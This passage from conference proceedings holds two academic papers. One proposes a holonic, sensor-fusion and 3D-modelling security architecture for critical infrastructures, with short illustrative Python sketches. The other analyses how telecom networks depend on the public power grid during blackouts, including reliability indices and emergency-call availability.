Development funded by a research grant from the Italian Ministry of University and Research (MUR) to TRS, which stands for “Technology and Research for Security”, a spinoff company from University Roma Tre and Theorematica.
foretell with certainty which ones: hence the need for contextual knowledge and educated guesses. In order to provide a higher level of awareness for the security and safety of complex critical infrastructures, we need a system architecture that is able to integrate human insight with the capacity of combining a myriad of events dispersed in time and space. Accordingly, we introduce here an advanced architecture for the protection of complex critical infrastructures. It includes: (a) a geometric reasoning engine, providing a multi-scale digital model of the infrastructure to be protected and supporting video surveillance and sensor fusion; (b) a distributed data mining environment, dedicated to event discovery and tracking; and (c) an advanced control center, supporting situation evaluation through dynamical modeling and simulation. In our opinion these components are the best candidates to: (i) serve as a point of reference for the integration of vision, sensor, tracking and security systems committed to infrastructure protection; (ii) provide a reliable basis for high-level situation awareness; (iii) enable coordinated and optimized decision making. Complex critical infrastructures, in particular those crossing national borders (such as tunnels, bridges, etc.) or affecting the everyday life of thousands of people (such as railway hubs, airports, power plants, etc.), require a novel security approach and architecture. Their security, i.e., the capacity of preventing threats and reacting to menaces, should be based on strong control and awareness of daily operations, since a security threat can arise not only from malicious attacks but also from natural events (storms, floods, etc.) or unexpected occurrences, like traffic congestion or collisions. An advanced security architecture should also provide means to infer the consequences of events from available information, possibly augmented via interpolation of missing elements. This is, in our view, the actual value of including virtual/augmented reality and advanced interfaces in our proposed architecture. Moreover, the knowledge base should be used for event analysis and decision making. Modeling and simulation are complementary components for decision support. Conversely, present-day security systems are generally assemblies of sensor subsystems, with very limited capabilities of assisting the personnel during normal operations and crises. In this paper we discuss the development goals and the implementation directions of a new platform for the security of critical infrastructures based on the above-described architecture. This platform is based on: (1) the capability of providing (natural or artificial) sight instruments; (2) event analysis and correlation for decision support.
2 Protection Functions
We imagine a holonic, multi-level organisation of custodians, which will maintain and use an awareness base represented by the integration of models, environment sensing, and surveillance and control activities. In this section we discuss the range of functions supported by the surveillance and protection units, either in isolation or in combination. Each of the characteristics discussed below
becomes more complex and sophisticated as the organizational level of the holonic unit grows.

Perception. Several passive and active sensor systems may be integrated, including video surveillance [9], access control (transponder, smartcard, RFID, etc.), intrusion detection (sound, infrared, etc.), and sensing of environmental components (fumes, fire, humidity, temperature, concentration of pollutants, etc.). Direct sensor fusion provides better information by combining data provided by homogeneous or heterogeneous sensors [10]. Indirect sensor fusion reinforces the process by using a priori knowledge about the scene and its environment. A statistically clustered history is assumed to be available. Furthermore, a known-scene hypothesis is also assumed to hold, whereby a solid model of the surrounding environment is always available at the appropriate level of detail. The central feature of our security platform is the design of software holons acting as a Community of Custodians. This community will embody the intelligence of the infrastructure, i.e., all the activities of sensing, operating devices, alerting security personnel, and so on. In particular, it makes up a holonic multi-scale organization, which maintains and uses an awareness base integrating both behavioral models and environmental sensing data, and supports surveillance and control activities.

Computation. A holonic architecture has to support distributed, fault-tolerant, real-time, non-stop applications. It should even support hot swapping of programs, so that the code of some agents can be changed without stopping the system. The actor model has been used both as a framework for a theoretical understanding of concurrency and as a basis for several practical implementations of concurrent systems. An actor can (a) make local decisions, (b) create other actors, (c) send and receive messages, and (d) determine how to respond to received messages. The actor model provides the easiest approach to agent-based computing, a computational model for simulating the actions and interactions of autonomous entities and individuals, which affect the system as a whole. In our holonic architecture the agents (often called holons here) can either be software agents, humans, human teams or combined human-agent teams. Monte Carlo methods are used to introduce randomness.

Visualization. According to the holonic architecture of the security platform and its strong 3D orientation, each holon will be provided with appropriate information visualization tools, ranging from graphical displays on mobile handsets held by security agents, to single workstations and service hubs located at key points of the security network, up to wall-panel displays in the control room(s). Visualization tools for virtual and augmented scenes will mainly be used for training the security personnel, and for displaying in a realistic way the results of simulations needed to support the decision makers during a crisis. The visualization tools may display highly realistic views of the rendered scene using a combination of advanced graphics techniques. For each location they will provide both visual and verbal directions on how to approach the selected destination. The main problem in the realistic visualization of virtual environments is the low quality of the (local) lighting models employed, since the Gouraud/Phong
model used by graphics hardware is too simplistic, the number of light sources is usually too low, and there is no interaction between reflecting surfaces; virtual objects should instead integrate seamlessly into real scenes, that is to say, without visual discontinuity and with adaptive tone mapping.

Interaction. The protection platform has a holonic architecture where each holon is autonomous within its defined limits, takes care of a defined portion of the infrastructure, and must be able to alert and communicate, in all circumstances, with the stakeholders of the controlled scene. All stakeholders involved in security and safety can communicate with any level of the monitoring platform, being aware that the controlled scene (and the impact of their decisions) generally grows bigger as the interface level gets higher. Accredited people will be able to access any detail of the awareness base, as required by the dynamics of the situation. The protection platform will provide:
1. the capability of planning all the activities of the security personnel, for both normal situations and emergencies;
2. the capability of planning the frequentation patterns [11] of people for normal situations, and the escape procedures in case of emergencies;
3. full awareness of the aspects of the situation that can impact the security and safety of the infrastructure, of the people involved and of its surroundings;
4. means of communicating as efficiently as possible (given the situation) with the personnel and the public involved.

Information security. Enforcing information security is a fundamental requirement for a holonic system whose purpose is to protect critical infrastructures. Every security failure in a single component may result in a breach of the security system and, as a consequence, of the critical infrastructure. Consequently, each holon must be protected with state-of-the-art security technology, in particular with mutual authentication of agents, machines, processes and services. Several ICT infrastructures, and most private companies, attempt to use firewalls to solve network security problems. Unfortunately, firewalls assume that "the bad guys" are on the outside, which is often a bad assumption: most computer crimes are carried out by insiders. Firewalls also have a significant disadvantage in that they restrict the use of the Internet. The restrictions of network functionality imposed by firewalls are often both unrealistic and unacceptable. Therefore, we assume network connections to be insecure.

Geometric reasoning. Spatial models play a key role when interpreting a dynamic and uncertain world for a surveillance application. In particular, [12], in "Spatial Models for Wide-Area Visual Surveillance: Computational Approaches and Spatial Building-Blocks", chooses the cellular decomposition representation of space as the most promising spatial primitive to support visual surveillance applications. That paper also discusses the necessity of associating semantics with the hierarchical elements of the spatial subdivision. To satisfy these requirements, we use the geometric language PLaSM for generating and handling the geometric information contained in our holonic security architecture. PLaSM (Programming LAnguage for Solid Modeling) is strongly
influenced by FL (programming at Function Level), the approach to functional programming [14,15] developed by the Functional Programming Group led by John Backus and John Williams at the IBM Research Division in Almaden in the early nineties. PLaSM provides the full power of a Turing-complete programming language, with support for conditionals, recursion, higher-level functional abstraction, etc. Moreover, it is multidimensional by design, a property that enhances its expressive power and allows very terse definitions of highly complex models.

Bayesian Reasoning. The assessment of static and dynamic knowledge requires an extensive use of the self-awareness provided by geometric models of the infrastructure and by dynamic patterns of usage [11] derived from sensor systems. Each holon must learn which configurations of its controlled scene are good, acceptable or to be avoided in order to enforce safety and security for the scene's stakeholders and users. This knowledge, again represented by models, involves security protocols, use of new technologies, procedures, etc., and has to evolve in relation to the changes of the social and physical environment. In particular, we imagine a multi-level holonic organization of both software and human custodians, which maintains and uses an awareness base that integrates models, environment sensing, surveillance and control activities. By awareness we mean the capability of having, in all situations, a clear view of what is happening, a history of past events, forecasts of future events, and simulations of possible scenarios. Such knowledge of the present situation, its precursors and its possible outcomes maximises the possibility of control.

Simulation. Living organisms learn through a trial-and-error process, which leads to optimized internal representations and simulations of the environment, which are in turn a consequence of the environmental configurations. Some models are inherited, some are developed during a lifetime. This learning process never ends, as the environment evolves and changes. The unconscious, and successful, assumption of this survival mechanism is that even if events are all different from each other, there are similarities and categorizations that allow an organism to infer the evolution of events, while they are happening, on the basis of experience. A concept central to the security platform is therefore to enhance its modeling capabilities as much as possible, since all the supports provided are based on model-based simulations. In order to simulate the behavior of an environment, the basic activity is modeling all the objects, actions and actors that in any way influence the behavior of the environment itself. Through the capability of simulating all kinds of events and all actions and reactions that may animate the environment, the platform will be capable of maintaining the controlled infrastructure, as much as possible, in an optimally secured state for its users and for the management personnel. The platform will also provide all possible support to security-enforcing personnel, in case of situations that exceed its capability of automatic management.

Operation command and control. In this holonic, multi-level control structure, the custodian agents will be structured in teams, and in teams of teams: in this way the organization will be scalable to any size. Each team or single custodian
controls a portion of the infrastructure, and/or exercises a specific technology. The stakeholders, i.e., the people responsible for security and safety, communicate with all levels of this monitoring structure. Security personnel activities will be performed across the entire structure, on the basis of routine and emergency process plans, and directed by an Operation and Control Center (OCC). In this respect, human-controlled activities will work as an orchestration of the software agents, whose autonomy will be greatly reduced, leaving people in complete control of the situation. People will be able to communicate with any level of the system, and to access all details of the awareness base. A minimal sketch of this team-of-teams structure is given at the end of this section.

Advanced interfaces for mobile information supports. The instruments provided are grouped into a number of metaphorical tools, which are named here Newspaper, Agenda, Map, Telephone and TV. Flexible interface methods will properly port each logical instrument to the physical interaction device (mobile handset display, computer display, video monitor, wall-panel display), accounting for their different sizes and interaction capabilities.
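As an informal aid (not part of the original design documents), the following Python sketch shows the recursive team-of-teams structure, with upward alert escalation and downward command propagation; all class and method names are illustrative assumptions.

```python
# Sketch of the "teams of teams" idea: a holon is either a single
# custodian (a leaf) or a team of holons; alerts escalate upward toward
# the OCC root and commands propagate downward to the custodians.
from dataclasses import dataclass, field


@dataclass
class Holon:
    name: str
    scope: str                    # portion of infrastructure or technology
    parent: "Holon" = None
    members: list = field(default_factory=list)

    def add(self, member: "Holon"):
        member.parent = self
        self.members.append(member)

    def escalate(self, alert: str):
        """Pass an alert up the hierarchy until the root handles it."""
        print(f"{self.name} reports: {alert}")
        if self.parent is not None:
            self.parent.escalate(alert)

    def command(self, order: str):
        """Propagate an order down to every custodian in the subtree."""
        for m in self.members:
            m.command(order)
        if not self.members:      # leaf custodian executes the order
            print(f"{self.name} executes: {order}")
```

Because the structure is recursive, a team of teams behaves exactly like a single team one level up, which is what makes the organization scalable to any size.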
3 Intelligent Video Surveillance
Surveillance systems consist of three main elements: Data Acquisition, Information Analysis, and On-Field Operation. Large surveillance systems acquire data from hundreds of networked cameras. With an increasing number of cameras and other data sensors, Information Analysis becomes increasingly difficult. Human operators can easily get overwhelmed by a flood of unorganized visual information, and they may fail to inform On-Field Operations in an effective way. The use of conventional user interfaces and fixed video display matrices is no longer sufficient, due to the increasingly large scale and complexity of the information flow [16]. The available screen resources and operator attention need to be empowered in a subtler, semantically richer and more interactive way [17]. Furthermore, today's cutting-edge surveillance systems perform very well [9] in relatively vacant environments. In an underpopulated scenario, people, vehicles and other objects can be easily tracked without a robust treatment of occlusions and of complex scene dynamics. However, as the monitored environment gets crowded, which is usually the case in transport infrastructures, these systems tend to fail, and the accuracy and reliability of the surveillance dramatically deteriorate. The holonic architecture of our security platform is aimed at integrating video surveillance as an independent subsystem that can be implemented, modified or substituted through the integration, modification or substitution of interfaces to the 3D modeling and knowledge base. The video surveillance subsystem shall permanently refer to the 3D model of the infrastructure, in order to be able to switch between the two representations as desired or useful (e.g., because of smoke, blackout, tracking a subject outside the camera field, etc.). Intelligent video surveillance subsystems capable of detecting and analyzing events and abnormal behaviors will work in a stand-alone mode and pass detected alerts to the knowledge base. The video
surveillance encoders will form a resilient inter-networked framework, fully and automatically redundant within itself, remotely managed and controlled. The video information originating from many sources will be distributed over the network to Operation Control Center (OCC) stations, equipped with video displays or desktop monitors, and simultaneously archived for offline analysis.
4 Automatic Generation of Digital 3D Models
Our geometric modeling and reasoning is based on a BSP (Binary Space Partition) generated cellular decomposition of buildings from architectural plans. The paradigmatic reference is to PLM (Product Lifecycle Management), where geometric information provides the exchange/collaboration layer shared by all business departments and all product data. A fast semi-automatic solution has already been tested, and can be summarized as follows. Input line drawings of 2D architectural plans are transformed into proper data structures, in order to answer proximity queries in an efficient way. Then semantics is assigned to small subsets of lines, via pattern-based recognition of the components of the building fabric (internal partitions, external enclosures, vertical communication elements, etc.), and subsequent translation into PLaSM scripts, i.e., symbolic generating forms. Later, the evaluation of the symbolic scripts produces either streaming solid models at variable levels of detail or adjacency graphs of the critical infrastructure as a whole or of parts thereof [18]. To achieve our purpose we capitalized on a novel parallel technology [19,20] for high-performance solid and geometric modeling, which (i) compiles the generating expression of the model into a dataflow network of concurrent threads, and (ii) splits the model into fragments to be distributed among different computational nodes and independently generated. Progressive BSP trees are used by [20] for adaptive and parallelizable streaming dataflow evaluation of geometric expressions. They are associated with the polyhedral cells of the HPC (Hierarchical Polyhedral Complex) data structure used by the language. Hasse graphs are used to maintain a complete representation of topology.
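For readers unfamiliar with BSP-generated decompositions, the toy Python sketch below partitions a set of 2D wall segments recursively; it is only a didactic illustration, not the PLaSM/HPC implementation of [19,20], which, among other things, splits straddling segments exactly rather than duplicating them.

```python
# Toy 2D BSP construction over wall segments ((x1, y1), (x2, y2)).
from dataclasses import dataclass


@dataclass
class BSPNode:
    line: tuple = None        # partition line (a, b, c): ax + by + c = 0
    splitter: tuple = None    # wall segment lying on that line
    front: "BSPNode" = None
    back: "BSPNode" = None
    segments: list = None     # leaf payload: segments in this cell


def side(line, p, eps=1e-9):
    a, b, c = line
    v = a * p[0] + b * p[1] + c
    return 0 if abs(v) < eps else (1 if v > 0 else -1)


def build(segments):
    """Recursive BSP construction: the first segment's supporting line
    partitions the rest; straddling segments are kept on both sides
    instead of being split exactly, to keep the sketch short."""
    if len(segments) <= 1:
        return BSPNode(segments=list(segments))
    (p1, p2), rest = segments[0], segments[1:]
    a, b = p2[1] - p1[1], p1[0] - p2[0]           # normal of the segment
    line = (a, b, -(a * p1[0] + b * p1[1]))
    front, back = [], []
    for s in rest:
        sides = {side(line, s[0]), side(line, s[1])} - {0}
        if sides <= {1}:
            front.append(s)
        elif sides <= {-1}:
            back.append(s)
        else:                                      # straddles the line
            front.append(s)
            back.append(s)
    return BSPNode(line=line, splitter=segments[0],
                   front=build(front), back=build(back))
```

The leaves of the resulting tree correspond to convex cells of the plan, which is the kind of cellular decomposition to which semantics (room, corridor, enclosure) can then be attached.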
5 Conclusion
The enormous size and complexity of modern surveillance scenarios generate a tremendous stream of data. The use of conventional user interfaces and fixed video display matrices appears no longer satisfactory, due to the increasingly large scale of the information flow. Therefore, the available screen real estate and operator attention need to be empowered in subtler, semantically richer and interactive ways. To this end, advanced computer graphics and state-of-the-art user interfaces are of paramount importance, where visual perception, 3D interactive computer graphics, Virtual Reality and Serious Games are closely integrated.
References

1. Gell-Mann, M.: What is complexity? Complexity 1(1), 16–19 (1995)
2. Complex Systems Society (CSS), http://css.csregistry.org
3. Dooley, K.: A complex adaptive systems model of organization change. Nonlinear Dynamics, Psychology, & Life Science 1(1), 69–97 (1997)
4. Waldrop, M.M.: Complexity: The Emerging Science at the Edge of Order and Chaos. Simon & Schuster, New York (1993)
5. Hilaire, V., Koukam, A., Rodriguez, S.: An adaptive agent architecture for holonic multi-agent systems. ACM Trans. Auton. Adapt. Syst. 3(1), 1–24 (2008)
6. Koestler, A.: The ghost in the machine. Arkana, London (1967)
7. Keil, D., Goldin, D.: Indirect interaction in environments for multiagent systems. In: Weyns, D., Parunak, V., Michel, F. (eds.) E4MAS 2005. LNCS, vol. 3830, pp. 68–87. Springer, Heidelberg (2006)
8. Weyns, D., Van Dyke Parunak, H., Michel, F. (eds.): E4MAS 2006. LNCS, vol. 3830. Springer, Heidelberg (2006)
9. Koschan, A., Pollefeys, M., Abidi, M.: 3D Imaging for Safety and Security. Computational Imaging and Vision, vol. 35. Springer, New York (2007)
10. Finkenzeller, K.: RFID Handbook: Fundamentals and Applications in Contactless Smart Cards and Identification, 2nd edn. Wiley, Chichester (2003)
11. Rueda, L., Mery, D., Kittler, J. (eds.): CIARP 2007. LNCS, vol. 4756. Springer, Heidelberg (2007)
12. Howarth, R.J.: Spatial models for wide-area visual surveillance: Computational approaches and spatial building-blocks. Artif. Intell. Rev. 23(2), 97–155 (2005)
13. Paoluzzi, A.: Geometric Programming for Computer Aided Design. John Wiley & Sons, Chichester (2003)
14. Backus, J., Williams, J.H., Wimmers, E.L.: An introduction to the programming language FL. In: Research Topics in Functional Programming, pp. 219–247. Addison-Wesley Longman Publ., Boston (1990)
15. Aiken, A., Williams, J.H., Wimmers, E.L.: The FL project: The design of a functional language (1991) (unpublished report)
16. Sebe, I.O., Hu, J., You, S., Neumann, U.: 3D video surveillance with augmented virtual environments. In: IWVS 2003: First ACM SIGMM International Workshop on Video Surveillance, pp. 107–112. ACM Press, New York (2003)
17. Girgensohn, A., Kimber, D., Vaughan, J., Yang, T., Shipman, F., Turner, T., Rieffel, E., Wilcox, L., Chen, F., Dunnigan, T.: DOTS: support for effective video surveillance. In: MULTIMEDIA 2007: Proceedings of the 15th International Conference on Multimedia, pp. 423–432. ACM, New York (2007)
18. Paoluzzi, A., Scorzelli, G.: Pattern-driven mapping from architectural plans to solid models of buildings. In: Israel-Italy Bi-National Conf. on Shape Modeling and Reasoning for Industrial and Biomedical Applications, Haifa, Israel, Technion (2007)
19. Bajaj, C., Paoluzzi, A., Scorzelli, G.: Progressive conversion from B-rep to BSP for streaming geometric modeling. Computer-Aided Design and Applications 3(5-6) (2006)
20. Scorzelli, G., Paoluzzi, A., Pascucci, V.: Parallel solid modeling using BSP dataflow. Journal of Computational Geometry and Applications 18(5), 441–467 (2008)
Challenges Concerning the Energy-Dependency of the Telecom Infrastructure

Lothar Fickert1, Helmut Malleck2, and Christian Wakolbinger1

1 Dept. for Electrical Power Systems, Graz University of Technology, Inffeldgasse 18, A-8010 Graz, Austria
[email protected], http://www.ifea.tugraz.at/
2 Project Management and Consulting in Telecommunications, ÖFEG, Arsenal Objekt 24, P.O. Box 147, A-1103 Wien, Austria
[email protected]

Abstract. Industry worldwide depends on Information and Communication Technology (ICT). During large-scale blackouts of the public electricity supply, telephone services and Internet connections are massively reduced in their functions, leading to cascading effects. Following an analysis of selected, typical failure situations, countermeasures to re-establish the public electricity supply to consumers in Austria are identified; this can also serve as an example for other countries. Based on the existing public electricity supply system, a sensitivity analysis both in the power and in the ICT sector, for the mobile and the fixed network, is carried out. As a possible new solution, "smart grids" or "microgrids" and the controlled operation of decentralized stable islands are investigated.

Keywords: Blackouts, interdependencies of power and information infrastructure, sensitivity analysis, smart grid, decentralized generation, islanded operation.
1 Introduction
Owing to technological developments, the infrastructure of Information and Communication Technology (ICT) is increasingly dependent on the public electricity supply. Security of supply from the public electricity network requires that the supply chain power producers – transmission network – distribution network – consumer not be interrupted. Up to now there are no comprehensive studies concerning the criticality of the ICT infrastructure with respect to its supply of electricity, nor are there coordinated approaches by the operators of public power supply networks towards the energy supply of critical ICT infrastructure. In this paper the sensitivities of the ICT infrastructure are identified, and first proposals for handling power outages in the ICT sector are made for telecommunications companies and consumers. Weaknesses are identified and means to improve the situation are presented.
2 Structures and Typical Fault Situations in Electrical Power Networks
Electrical energy usually flows from the power plants to the consumers through the high-voltage networks (380/110 kV), via transformers into the regional medium-voltage networks (20 kV), and further on into the local low-voltage grids [1] (see Fig. 1).
Fig. 1. Technical structure of the public electricity supply
The most significant impairment of the energy supply is caused by electrical faults, especially insulation faults. These are local disturbances and require the tripping of the faulty network element. Generally, for economic reasons, the entire defective section is tripped and the electricity supply is shut down for all connected consumers. The most common fault in power networks is the phase-to-earth fault. In 400-kV transmission networks and in low-voltage networks, which usually have a low-ohmic star-point earthing, such faults force a shutdown of the affected part of the network. In earth-fault-compensated medium-voltage networks, as are common in Central Europe, operation can continue despite an existing phase-to-earth fault because the local fault current is small. However, in these networks a single phase-to-earth fault often develops into multiple cross-country faults; then the supply of electricity has to be shut down in any case, which leads to blackouts in certain parts of the network.
In contrast to these locally restricted disturbances, so-called large-scale disturbances represent another threat scenario. Mostly they originate from a not completely mastered disturbance in the high- or very-high-voltage network and lead to large-scale power failures. Good examples are weather-related common-mode failures, such as those experienced during the recent cyclones Kyrill and Paula, which led to major power disturbances [2]. If the network instability also affects generating units, the consequence is a slow, step-by-step overall system restoration. This requires that independent network operators and – equally independent – power plant operators act in a coordinated way. At present there is little practical experience on the operators' side in resolving major disturbances. It is therefore generally assumed that, in the case of large-scale disturbances, the subsequent restoration times are in the range of several hours up to one or two days.

The European Standard EN 50160 "Voltage Characteristics in Public Electricity Supply Networks" [3] states as characteristics of the delivered voltage that

– "supply voltage dips" (maximum duration: 1 minute, residual voltage: less than 90% of the contract voltage) may occur with a frequency of up to a few tens to up to one thousand per year;
– "short interruptions of the supply voltage" (maximum duration: 3 minutes, residual voltage: less than 1% of the contract voltage) may occur with a frequency of up to a few tens to up to several hundred per year;
– "long interruptions of the supply voltage" (duration longer than 3 minutes, residual voltage: less than 1% of the contract voltage) may occur with a frequency of less than 10 up to 50 per year, depending on the area.

Blackouts affect entire regions and are rare events. There are no trustworthy statistics and no prediction models regarding their frequency and typical consumer downtime. Nevertheless it must be assumed that entire regions become de-energized – statistically speaking – once every 10 years, with a downtime of 4 to 8 hours and, in the worst case, up to 48 hours. As fault statistics show, disturbances in the medium- and low-voltage networks afflict the consumers most seriously. These distribution grids are therefore examined in more detail. Their characteristics are the unidirectional load flow, the direct connection of the consumers to ring main units, the possibility to re-connect disturbed network sections by means of normally open circuit breakers or isolating switches, and simple protection devices. Consumers are mostly supplied by simple radial networks, in which the consumers (ring main units) are supplied with electric energy from the power source (main substation transformer) in a series connection. The advantage of this simple and transparent network structure is partly counterbalanced by the disadvantage that, in the case of an electrical fault or other shutdown situations – for example, when repairs are carried out – the flow of energy to the downstream consumers is interrupted. In a ring-structured network, which is usually operated as a radial network, a line failure no longer necessarily leads to a longer-lasting power failure.
The possibility to reclose a normally open circuit breaker or load isolating switch re-establishes the electricity supply to the consumers from another power source. Such structures are desirable in medium-voltage networks, but in low-voltage networks a back-up supply is generally not available. Supply reliability is most effectively described by the UNIPEDE (International Union of Producers and Distributors of Electrical Energy) approach, by means of technical methods and the following measurable parameters:

– ASIDI, Average System Interruption Duration Index . . . from the system viewpoint
– SAIFI, System Average Interruption Frequency Index . . . from the system viewpoint
– CAIDI, Customer Average Interruption Duration Index . . . from the individual customer's viewpoint

The average system interruption duration is already evaluated by most energy regulators; in Austria the ASIDI value of 48 minutes indicates top performance of the public networks. By means of this index one can calculate the individual interruption duration according to

\[ \mathrm{CAIDI} = \frac{\mathrm{ASIDI}}{\mathrm{SAIFI}} \tag{1} \]

When the (usually small) annual system non-availability (ASIDI) is divided by the (also usually small) average system interruption frequency (SAIFI), one obtains the duration of an individual interruption. This quotient may be quite high, at least compared to the average system outage time. Example: with an average system interruption duration of 48 minutes per year for Austria and an assumed failure rate of one fault in eight years (\( \mathrm{SAIFI} = \tfrac{1}{8}\,a^{-1} \)), one obtains a representative individual customer interruption duration of

\[ \mathrm{CAIDI} = 48\ \mathrm{min} \cdot a^{-1} \cdot \frac{1}{\tfrac{1}{8}\,a^{-1}} = 384\ \mathrm{min} \approx 6.5\ \mathrm{hours} \tag{2} \]

This means that a representative consumer is – generally speaking – without electrical power supply once every eight years, for a duration of approximately 6.5 hours.
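The relation between these indices is easy to check numerically. A minimal sketch (Python, purely illustrative) reproducing the worked example above; the figures are the ones quoted in the text:

```python
def caidi(asidi_min_per_year: float, saifi_per_year: float) -> float:
    """Individual customer interruption duration: CAIDI = ASIDI / SAIFI."""
    return asidi_min_per_year / saifi_per_year

# Figures from the example: ASIDI = 48 min/year, SAIFI = 1 fault per 8 years.
duration_min = caidi(48.0, 1.0 / 8.0)
print(f"CAIDI = {duration_min:.0f} min = {duration_min / 60:.1f} h")
# prints: CAIDI = 384 min = 6.4 h
```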
3 ICT Dependency on the Public Power Grid (PPG)
As Information and Communication Technology progresses, its dependencies on the public power grid give cause for concern. These dangers are clarified in the following examination of the mobile networks, the fixed network and the Internet Service Providers with respect to the ICT network topology [4].
3.1 Mobile Networks
Immediately after a failure of the public electricity supply, mobile networks continue to work without interruption. However, base stations in containers, or in rented premises with integrated emergency batteries, generally cannot bridge blackouts lasting several hours. Base stations in the buildings of switching sites have significantly longer operating times during a power failure, depending on the grid replacement facilities installed there. Uninterruptible power supply facilities with emergency diesel engines also ensure that key network components with interfaces to other communication networks, the so-called Mobile Switching Centers (MSC), can be kept running for several days. It is not clear, however, whether all mobile operators are aware of this situation. Mobile devices work independently of the mains supply for a certain length of time, provided that their batteries are charged.
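The bridging times mentioned here follow from a simple energy balance. A minimal sketch; the capacity, load and derating figures are illustrative assumptions, not operator data:

```python
def bridging_time_h(battery_wh: float, load_w: float, usable: float = 0.8) -> float:
    """Hours a backup battery can carry a constant load; 'usable' lumps
    together depth-of-discharge limits and conversion losses."""
    return battery_wh * usable / load_w

# Illustrative only: a container base station with a 10 kWh battery bank
# and a 1.5 kW average load bridges a little over five hours.
print(f"{bridging_time_h(10_000, 1_500):.1f} h")  # 5.3 h
```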
3.2 Fixed Network
Switching facilities in the fixed network and central installations of the broadband access technology also work without interruption at first when the public power supply fails. With the introduction of broadband technology, the facilities located between the central office and the end user must also be considered. The power supply of these intermediate facilities, situated in wall niches and at the roadside (street cabinets), is delivered either from the central office by means of the now-redundant twisted pairs of the access line, or directly on the spot from the public power grid. In the former case an emergency power supply is ensured; in the latter case, as with the recently proposed reverse feeding from the end user, generally no functionality is possible during a blackout of the public electricity network. End-user facilities such as cordless telephones, answering machines, home telephone systems, modems and PCs generally require the public electricity network in order to function. Powering the end users' facilities through the access lines from the central office is no longer possible, because modern devices have a significantly higher power consumption than conventional phones. Nowadays many end-user facilities thus depend on the availability of the electricity network. This will apply particularly after the introduction of Next Generation Networks [5], with the outsourcing of switching intelligence to the terminal equipment at the edge of the network, and clearly when the end user is connected via fibre-optic cables: the user then has to provide the emergency power supply for his ICT devices himself. Uninterruptible power supply systems for private use, for the agricultural sector and for small and medium-sized businesses often have small power capabilities and relatively short bridging times. Even though the power consumption of communication terminals, PCs, routers, etc. is relatively low, the emergency power supply times are not increasing at the same rate. Analyses of complete end-to-end connections with regard to maintaining communication relations during a partial or full failure of the public electricity networks will be imperative.
3.3 Internet Service Provider
Nowadays, as long as ICT network access is operative, all the previously mentioned provisions for emergency electricity are effective. But there remains the question of what possibilities exist to bridge power failures in the computing centres of the Internet Service Providers. Once more, in most cases an uninterrupted continuation of the power supply using emergency diesel engines is foreseen. For Web 2.0 services the dependence on a single provider's electrical capacity is reduced, as the information can be transported via alternative packet-switched routes.
4 Sensitivity Analysis
Blackouts of the public electricity supply can heavily restrict the functionality of telephone and Internet connections. A sensitivity analysis of both the mobile and the fixed networks is carried out in order to answer, or at least qualitatively estimate, the question of what happens to telephone and Internet access if the public electricity supply fails for hours or days. It is based on the structure of the public electricity supply, its disturbances and their impact. The resulting impact on ICT during and after blackouts is analysed in general, and the impact on emergency situations in particular. Ultimately, the end-to-end availability in heterogeneous communication networks with different service providers is considered in order to place the findings within the concept of "best practice".
4.1 Emergencies
The ability to contact state authorities or the emergency services (blue-light organisations) is of paramount importance. People dependent on the functionality of their domestic emergency systems, such as pensioners and the disabled, are particularly hard hit by power losses. If the local Voice over Internet Protocol (VoIP) adapter is disabled, no further emergency calls can be made. Only "ancient" corded telephones, which are powered centrally over the access line, keep users independent of a failure of the locally available public electricity network. For certain groups of users – such as the emergency services – the GSM specifications in principle contain provisions allowing them preferential treatment in switching [6]. Emergency calls in mobile networks are often given priority: if no channel is free, an existing conversation is automatically disconnected in order to free a channel for the emergency call. For emergency calls to the international emergency number 112, a connection attempt is made with priority whenever the mobile phone can reach any base station, irrespective of which network operator the phone is contracted to. If, however, all reachable radio base stations become inoperative shortly after losing their power supply, such measures are of no help. Further research is required to clarify the capabilities of the mobile operators to secure and ensure accessibility to the emergency services.
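The preferential treatment described above can be pictured as preemptive channel allocation. The sketch below is a deliberate simplification (the actual GSM priority mechanism is specified in [6] and is considerably more involved):

```python
from dataclasses import dataclass, field
from typing import List

@dataclass
class Cell:
    channels: int                                   # traffic channels in the cell
    active: List[str] = field(default_factory=list)

    def request(self, call: str, emergency: bool = False) -> bool:
        if len(self.active) < self.channels:        # a channel is free
            self.active.append(call)
            return True
        if emergency:                               # preempt an ordinary call
            self.active.pop(0)
            self.active.append(call)
            return True
        return False                                # ordinary call is blocked

cell = Cell(channels=2)
cell.request("call-A"); cell.request("call-B")
assert not cell.request("call-C")                   # blocked: cell is full
assert cell.request("112", emergency=True)          # connected by dropping call-A
```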
Emergency call centres, the Public-Safety Answering Points (PSAPs), always demand 100% accessibility. This is for the most part ensured by uninterruptible power supply systems backed by emergency diesel engines, switched on in the emergency situation, which bridge short and long power outages. However, in the case of widespread power outages even PSAPs with uninterruptible power supplies can be overloaded in their communication and power capacities by the many calls generated by the outage itself. In small PSAPs the telephone equipment is connected directly to the emergency lines, but the computer system of the PSAP is then normally no longer operational. Subsequent to widespread power outages a cascade effect can occur for the PSAPs, because not only the normal call volume but also the calls accumulated in the meantime have to be handled. The emergency services have often not been designed for these capacities, especially if reinforcement is not possible. Owing to the specialisation of labour, the mutual dependence of individuals in our society is high; at the same time, solidarity is in decline, and social relationships between individuals and social groups are becoming increasingly problematic and less satisfactory. The reliance on external support (state, blue-light organisations) rises. Particularly in the event of large electricity disruptions, when the need for help increases, the non-availability of these institutions creates a strong perception of insecurity.
4.2 Topology Comparison: PPG vs. ICT Topology
Many supply disruptions affect only parts of the electricity supply network, e.g. only one feeder in a radially structured network. In contrast, in the course of a major blackout the entire public power supply is interrupted. The failure of a radial feeder means – geographically speaking – a power failure in one sector of the supply area (rural supply) or in one corridor (urban supply). However, since the supply areas of the ICT facilities are structured differently (see Fig. 2), the overlaps are essentially random, so that a disruption of a single feeder affects the ICT infrastructure only partially. To what extent coverage can be maintained from the overlapping edges of an ICT cell is the subject of further studies. A special case is the major blackout, in which there is no possibility of maintaining supply from the edges of the coverage area. Here solutions are necessary which allow a targeted energy supply to sensitive ICT customers.
4.3 Problem-Solving Potential of "Smart Grids" and "Smart Metering"
Even if, in a heavily disturbed network, small generation facilities such as cogeneration plants (Combined Heat and Power, CHP), small hydro power stations, etc. are still present and in operation, they must trip out automatically despite their theoretical potential to supply islanded parts of the network. The reason for this operating mode lies in the fact that the supply of electricity under these circumstances would, in the present-day situation, lead to technically uncontrolled islands.
Fig. 2. Principle of the classic topology for fixed and mobile networks
